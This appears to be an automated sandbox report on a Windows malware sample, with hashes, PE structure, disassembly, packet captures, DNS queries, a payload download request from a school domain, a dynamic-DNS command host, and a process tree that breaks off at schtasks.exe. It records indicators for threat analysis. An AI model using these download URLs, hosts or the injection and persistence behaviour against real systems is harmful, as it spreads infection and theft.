Entropy (8bit):	5.174708300114262
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Variant.Razy.845229.13077.exe
File size:	106496
MD5:	532e58083cf5638b05f617fcbbb5d63b
SHA1:	98058e52de678575ff2327d129a58313af4a3fc0
SHA256:	75888910c75a9858137089eb35d48b6b1af6d43817e9a1dbb9fbc409fdaad511
SHA512:	eab390f92d05fcc3ba8d0474555c1db78becfdb81865d4fada0c292a3e50ea6ed00b875b99e5a4d6fd96fc3116416858b1c574e8d14b0564524e8eac849ed20a
SSDEEP:	1536:3qN/HQiDkZQzBkKgIYNP7dmoK2gKpKeBEYjBqN/HQi:gkZQzB6IY9dEKpKng
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\...T...%.......Rich............................PE..L...\L.J.................@...p......x........P....@

File Icon


Icon Hash:	d8d490d4c4bcdef9

Static PE Info

General
Entrypoint:	0x401378
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4A164C5C [Fri May 22 06:55:24 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5fb04c04dc9621084e24b4642ca2fed6

Entrypoint Preview

Instruction
push 004100F0h
call 00007F46F8CA4D95h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+4Dh], bh
enter 4739h, E0h
test byte ptr [eax-72h], FFFFFFDAh
popad
or eax, 06084A40h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push ebx
jo 00007F46F8CA4E07h
popad
imul esp, dword ptr [ebp+72h], 70h
push 66656E6Fh
popad
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or eax, 337C8890h
add edx, dword ptr [ebx]
dec edx
xchg edx, esp
add eax, esp
jmp 00007F46F8CA4D59h
and eax, 50F2FD35h
je 00007F46F8CA4D6Ch
jnle 00007F46F8CA4DEFh
xchg eax, ebp
les eax, fword ptr [edx]
wait
lodsb
stosd
movsb
lea edi, dword ptr [edx]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
daa
fld qword ptr [eax]
add byte ptr [eax+2Dh], cl
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [ecx+70h], ah
jo 00007F46F8CA4E14h
outsd
bound esp, dword ptr [ecx+74h]
imul eax, dword ptr [eax], 000B010Dh
inc esp
outsb
outsd
insd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14124	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x3084	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x114	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x135ec	0x14000	False	0.337573242188	data	5.7034958497	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x2560	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x3084	0x4000	False	0.105895996094	data	3.23453967052	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x193dc	0x1ca8	data
RT_ICON	0x18734	0xca8	data
RT_ICON	0x183cc	0x368	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1839c	0x30	data
RT_VERSION	0x18150	0x24c	data	Hungarian	Hungary

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x040e 0x04b0
InternalName	Compurgato
FileVersion	1.00
CompanyName	ColdStone
Comments	ColdStone
ProductName	ColdStone
ProductVersion	1.00
OriginalFilename	Compurgato.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Hungarian	Hungary

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-11:57:30.237786	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 11:57:29.280534983 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.519085884 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.519177914 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.519809961 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.757846117 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758059978 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758138895 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758244038 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758263111 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758280039 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758291960 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758296967 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758323908 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758330107 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758371115 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758378983 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758399010 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758440018 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758719921 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758763075 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997093916 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997114897 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997128010 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997139931 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997268915 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997319937 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997556925 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997575045 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997591019 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997607946 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997611046 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997625113 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997639894 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997646093 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997663975 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997668982 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997680902 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997698069 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997699976 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997714996 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997723103 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997730970 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997746944 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997761965 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997761965 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997781992 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997801065 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997833014 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.238229036 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238250971 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238266945 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238286018 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238307953 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238326073 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238327026 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.238348961 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238365889 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.238420010 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241105080 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241126060 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241143942 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241168022 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241188049 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241194963 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241208076 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241219044 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241240978 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241240978 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241265059 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241282940 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241288900 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241316080 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241322994 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241338968 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241352081 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241367102 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241410971 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241415024 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241422892 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241437912 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241451979 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241461039 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241477013 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241487026 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241498947 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241511106 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241525888 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241538048 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241549969 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241561890 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241573095 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241585016 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241597891 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241607904 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241624117 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241625071 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241641998 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241647959 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241660118 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241676092 CET	80	49741	103.150.60.242	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 11:53:27.402848005 CET	54302	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.451468945 CET	53	54302	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.548495054 CET	53784	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.597136974 CET	53	53784	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.601881981 CET	65307	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.653352976 CET	53	65307	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.753978014 CET	64344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.802653074 CET	53	64344	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.810460091 CET	62060	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.859040022 CET	53	62060	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.919210911 CET	61805	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.967927933 CET	53	61805	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:30.684515953 CET	54795	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:30.733191013 CET	53	54795	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:30.863934040 CET	49557	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:30.922516108 CET	53	49557	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:31.931307077 CET	61733	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:31.979897976 CET	53	61733	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:33.173508883 CET	65447	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:33.225016117 CET	53	65447	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:34.183844090 CET	52441	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:34.232310057 CET	53	52441	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:37.819720030 CET	62176	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:37.878554106 CET	53	62176	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:54.709980011 CET	59596	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:54.771769047 CET	53	59596	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:59.117594004 CET	65296	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:59.169214964 CET	53	65296	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:00.076630116 CET	63183	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:00.134829998 CET	53	63183	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:03.667221069 CET	60151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:03.718749046 CET	53	60151	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:04.970557928 CET	56969	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:05.023955107 CET	53	56969	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:06.463258028 CET	55161	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:06.523981094 CET	53	55161	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:22.320291996 CET	54757	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:22.371752024 CET	53	54757	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:23.040867090 CET	49992	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:23.091963053 CET	53	49992	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:23.203481913 CET	60075	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:23.252090931 CET	53	60075	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:41.438749075 CET	55016	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:41.487498045 CET	53	55016	8.8.8.8	192.168.2.5
Feb 23, 2021 11:55:27.035197020 CET	64345	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:55:27.083903074 CET	53	64345	8.8.8.8	192.168.2.5
Feb 23, 2021 11:55:45.315054893 CET	57128	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:55:45.373301029 CET	53	57128	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:22.429409981 CET	54791	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:22.497596979 CET	53	54791	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:23.086483002 CET	50463	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:23.146323919 CET	53	50463	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:23.750447035 CET	50394	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:23.807349920 CET	53	50394	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:24.334043980 CET	58530	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:24.415599108 CET	53	58530	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:24.975594044 CET	53813	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:25.034773111 CET	53	53813	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:25.765847921 CET	63732	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:25.823873043 CET	53	63732	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:26.480931997 CET	57344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:26.539541006 CET	53	57344	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:26.806000948 CET	54450	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:26.876113892 CET	53	54450	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:27.475321054 CET	59261	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:27.524157047 CET	53	59261	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:30.790479898 CET	57151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:30.894408941 CET	53	57151	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:32.489547014 CET	59413	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:32.541115046 CET	53	59413	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:27.851294994 CET	60516	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:28.869720936 CET	60516	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:29.251405001 CET	53	60516	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:30.237633944 CET	53	60516	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:34.310029030 CET	51649	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:34.393537045 CET	53	51649	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:44.481472969 CET	65086	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:44.550745964 CET	53	65086	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:52.497247934 CET	56432	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:52.563999891 CET	53	56432	8.8.8.8	192.168.2.5
Feb 23, 2021 11:58:00.529602051 CET	52929	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:58:00.589838982 CET	53	52929	8.8.8.8	192.168.2.5
Feb 23, 2021 11:58:08.592498064 CET	64317	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:58:08.652335882 CET	53	64317	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 23, 2021 11:57:30.237786055 CET	192.168.2.5	8.8.8.8	d006	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 11:57:27.851294994 CET	192.168.2.5	8.8.8.8	0xc660	Standard query (0)	mtspsmjeli.sch.id	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:28.869720936 CET	192.168.2.5	8.8.8.8	0xc660	Standard query (0)	mtspsmjeli.sch.id	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:34.310029030 CET	192.168.2.5	8.8.8.8	0x8e87	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:44.481472969 CET	192.168.2.5	8.8.8.8	0x725f	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:52.497247934 CET	192.168.2.5	8.8.8.8	0x9558	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)
Feb 23, 2021 11:58:00.529602051 CET	192.168.2.5	8.8.8.8	0x65e3	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)
Feb 23, 2021 11:58:08.592498064 CET	192.168.2.5	8.8.8.8	0xfaca	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 23, 2021 11:57:29.251405001 CET	8.8.8.8	192.168.2.5	0xc660	No error (0)	mtspsmjeli.sch.id	103.150.60.242	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:30.237633944 CET	8.8.8.8	192.168.2.5	0xc660	No error (0)	mtspsmjeli.sch.id	103.150.60.242	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:34.393537045 CET	8.8.8.8	192.168.2.5	0x8e87	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:44.550745964 CET	8.8.8.8	192.168.2.5	0x725f	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:52.563999891 CET	8.8.8.8	192.168.2.5	0x9558	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)
Feb 23, 2021 11:58:00.589838982 CET	8.8.8.8	192.168.2.5	0x65e3	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)
Feb 23, 2021 11:58:08.652335882 CET	8.8.8.8	192.168.2.5	0xfaca	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

mtspsmjeli.sch.id

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49741	103.150.60.242	80	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 11:57:29.519809961 CET	9436	OUT	GET /cl/Maly%20nanocre%202021_ECMFFfzt176.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mtspsmjeli.sch.id Cache-Control: no-cache
Feb 23, 2021 11:57:29.758059978 CET	9436	IN	HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: application/octet-stream Last-Modified: Wed, 17 Feb 2021 16:04:20 GMT Accept-Ranges: bytes Content-Length: 207936 Date: Tue, 23 Feb 2021 10:57:29 GMT Server: LiteSpeed

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Variant.Razy.845229.13077.exe PID: 6184 Parent PID: 5536

General

Start time:	11:53:33
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	532E58083CF5638B05F617FCBBB5D63B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Analysis Process: RegAsm.exe PID: 5276 Parent PID: 6184

General

Start time:	11:57:14
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Imagebase:	0x780000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exe PID: 5964 Parent PID: 5276

General

Start time:	11:57:15
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: schtasks.exe PID: 5464 Parent PID: 5276

General

Start time:	11:57:31
Start date:	23/02/2021
